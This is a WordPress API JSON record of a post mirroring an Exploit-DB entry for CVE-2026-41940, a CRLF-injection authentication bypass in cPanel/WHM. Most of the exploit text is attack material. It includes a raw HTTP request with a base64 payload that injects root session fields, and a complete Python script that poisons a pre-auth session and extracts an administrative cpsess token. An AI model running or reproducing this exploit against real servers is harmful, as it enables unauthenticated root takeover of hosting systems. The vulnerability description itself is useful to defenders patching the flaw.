{"id":56933,"date":"2026-05-26T10:35:25","date_gmt":"2026-05-26T10:35:25","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=56933"},"modified":"2026-05-26T10:35:25","modified_gmt":"2026-05-26T10:35:25","slug":"cpanel-crlf-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=56933","title":{"rendered":"cPanel – CRLF Injection_EDB-ID:52574"},"content":{"rendered":"

{“lastseen”:”2026-05-26T15:27:57″,”description”:”ExploitTitle: cPanel 11.40 – CRLF Injection Author: nu11secur1tyAI Date: 2026-04-30 Vendor: cPanel, L.L.C. Software: cPanel \\u0026 WHM cpsrvd Reference: CVE-2026-41940 \/ watchTowr-2026-01 Description: A critical authentication bypass vulnerability exists in…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”cPanel – CRLF Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52574″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-41940″],”sourceData”:”# ExploitTitle: cPanel 11.40 – CRLF Injection\\r\\n# Author: nu11secur1tyAI\\r\\n# Date: 2026-04-30\\r\\n# Vendor: cPanel, L.L.C.\\r\\n# Software: cPanel \\u0026 WHM (cpsrvd)\\r\\n# Reference: CVE-2026-41940 \/ watchTowr-2026-01\\r\\n\\r\\n## Description:\\r\\nA critical authentication bypass vulnerability exists in the cPanel\/WHM\\r\\n`cpsrvd` daemon due to improper neutralization of line delimiters (CRLF) in\\r\\nthe `whostmgrsession` cookie and `Authorization` headers. An\\r\\nunauthenticated remote attacker can leverage this flaw to inject malicious\\r\\nsession parameters directly into the server’s flat-file session metadata\\r\\nstore. By injecting sequences such as `user=root`, `hasroot=1`, and\\r\\n`tfa_verified=1`, the attacker subverts the internal authentication logic,\\r\\nforcing the system to issue a valid administrative session token\\r\\n(`\/cpsessXXXXXXXXXX\/`). This grants the attacker full `root` privileges\\r\\nover the WHM interface and the host operating system without requiring\\r\\nvalid credentials.\\r\\n\\r\\nSTATUS: MEDIUM – HIGH \/ Vulnerability\\r\\n\\r\\n[+] Payload:\\r\\n“`http\\r\\nGET \/ HTTP\/1.1\\r\\nHost: [TARGET_HOST]:2087\\r\\nAuthorization: Basic\\r\\ncm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x\\r\\nCookie: whostmgrsession=[PREAUTH_SESSION_ID]\\r\\nConnection: close\\r\\n“`\\r\\n\\r\\n[+] Exploit (Python):\\r\\n\\r\\nimport argparse\\r\\nimport re\\r\\nimport requests\\r\\nimport urllib.parse\\r\\nimport urllib3\\r\\n\\r\\n# Disable SSL warnings for cleaner output\\r\\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\r\\n\\r\\n# Crafted B64 payload:\\r\\n#\\r\\nroot:x\\\\r\\\\nsuccessful_internal_auth_with_timestamp=9999999999\\\\r\\\\nuser=root\\\\r\\\\ntfa_verified=1\\\\r\\\\nhasroot=1\\r\\nPAYLOAD_B64 =\\r\\n\\”cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x\\”\\r\\n\\r\\ndef exploit(target):\\r\\n s = requests.Session()\\r\\n s.verify = False\\r\\n\\r\\n print(f\\”[*] Initializing attack on {target}…\\”)\\r\\n\\r\\n # Stage 1: Obtain pre-auth session base\\r\\n try:\\r\\n r = s.post(f\\”{target}\/login\/?login_only=1\\”, data={\\”user\\”: \\”root\\”,\\r\\n\\”pass\\”: \\”wrong_pass\\”}, allow_redirects=False, timeout=10)\\r\\n cookie = r.headers.get(\\”Set-Cookie\\”, \\”\\”)\\r\\n match = re.search(r\\”whostmgrsession=([^;,]+)\\”, cookie)\\r\\n if not match:\\r\\n print(\\”[-] Error: Could not retrieve whostmgrsession cookie.\\”)\\r\\n return\\r\\n session_base = urllib.parse.unquote(match.group(1))\\r\\n print(f\\”[+] Obtained session base: {session_base}\\”)\\r\\n\\r\\n # Stage 2: Poison session via CRLF Injection\\r\\n headers = {\\r\\n \\”Authorization\\”: f\\”Basic {PAYLOAD_B64}\\”,\\r\\n \\”Cookie\\”: f\\”whostmgrsession={urllib.parse.quote(session_base)}\\”,\\r\\n \\”Connection\\”: \\”close\\”\\r\\n }\\r\\n r = s.get(f\\”{target}\/\\”, headers=headers, allow_redirects=False,\\r\\ntimeout=10)\\r\\n\\r\\n # Stage 3: Extract leaked security token\\r\\n location = r.headers.get(\\”Location\\”, \\”\\”)\\r\\n token_match = re.search(r\\”\/cpsess\\\\d{10}\\”, location)\\r\\n\\r\\n if token_match:\\r\\n token = token_match.group(0)\\r\\n print(f\\”[!] EXPLOIT SUCCESSFUL!\\”)\\r\\n print(f\\”[!] Leaked Token: {token}\\”)\\r\\n print(f\\”[!] Access URL: {target}{token}\/\\”)\\r\\n else:\\r\\n print(\\”[-] Exploit failed. The target may be patched or\\r\\nprotected by a WAF.\\”)\\r\\n\\r\\n except Exception as e:\\r\\n print(f\\”[-] Connection error: {e}\\”)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n parser = argparse.ArgumentParser(description=\\”cPanel\/WHM CVE-2026-41940\\r\\nExploit\\”)\\r\\n parser.add_argument(\\”–target\\”, required=True, help=\\”Target URL (e.g.,\\r\\n[https:\/\/192.168.1.1:2087](https:\/\/192.168.1.1:2087))\\”)\\r\\n args = parser.parse_args()\\r\\n exploit(args.target.rstrip(\\”\/\\”))\\r\\n\\r\\n“`\\r\\n[+]Reproduce:\\r\\nhttps:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/2026\/CVE-2026-41940\\r\\n\\r\\nTime spent:\\r\\n03:45:00\\r\\n\\r\\n–\\r\\n\\r\\nSystem Administrator – Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstormsecurity.com\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\nnu11secur1ty https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\n\\r\\n– \\r\\n\\r\\nSystem Administrator – Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstorm.news\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\n0day Exploit DataBase https:\/\/0day.today\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\n nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52574″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52574″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-26T15:27:57″,”description”:”ExploitTitle: cPanel 11.40 – CRLF Injection Author: nu11secur1tyAI Date: 2026-04-30 Vendor: cPanel, L.L.C. Software: cPanel \\u0026 WHM cpsrvd Reference: CVE-2026-41940 \/ watchTowr-2026-01 Description: A critical…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-56933","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\ncPanel - CRLF Injection_EDB-ID:52574 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=56933\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"cPanel - CRLF Injection_EDB-ID:52574 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-26T15:27:57″,”description”:”ExploitTitle: cPanel 11.40 – CRLF Injection Author: nu11secur1tyAI Date: 2026-04-30 Vendor: cPanel, L.L.C. Software: cPanel u0026 WHM cpsrvd Reference: CVE-2026-41940 \/ watchTowr-2026-01 Description: A critical...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=56933\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-26T10:35:25+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"cPanel – CRLF Injection_EDB-ID:52574\",\"datePublished\":\"2026-05-26T10:35:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933\"},\"wordCount\":943,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56933#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933\",\"name\":\"cPanel - CRLF Injection_EDB-ID:52574 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-26T10:35:25+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56933\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56933#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"cPanel – CRLF Injection_EDB-ID:52574\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"cPanel - CRLF Injection_EDB-ID:52574 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=56933","og_locale":"en_US","og_type":"article","og_title":"cPanel - CRLF Injection_EDB-ID:52574 - zero redgem","og_description":"{“lastseen”:”2026-05-26T15:27:57″,”description”:”ExploitTitle: cPanel 11.40 – CRLF Injection Author: nu11secur1tyAI Date: 2026-04-30 Vendor: cPanel, L.L.C. Software: cPanel u0026 WHM cpsrvd Reference: CVE-2026-41940 \/ watchTowr-2026-01 Description: A critical...","og_url":"https:\/\/zero.redgem.net\/?p=56933","og_site_name":"zero redgem","article_published_time":"2026-05-26T10:35:25+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=56933#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=56933"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"cPanel – CRLF Injection_EDB-ID:52574","datePublished":"2026-05-26T10:35:25+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=56933"},"wordCount":943,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=56933#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=56933","url":"https:\/\/zero.redgem.net\/?p=56933","name":"cPanel - CRLF Injection_EDB-ID:52574 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-26T10:35:25+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=56933#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=56933"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=56933#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"cPanel – CRLF Injection_EDB-ID:52574"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56933","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56933"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56933\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}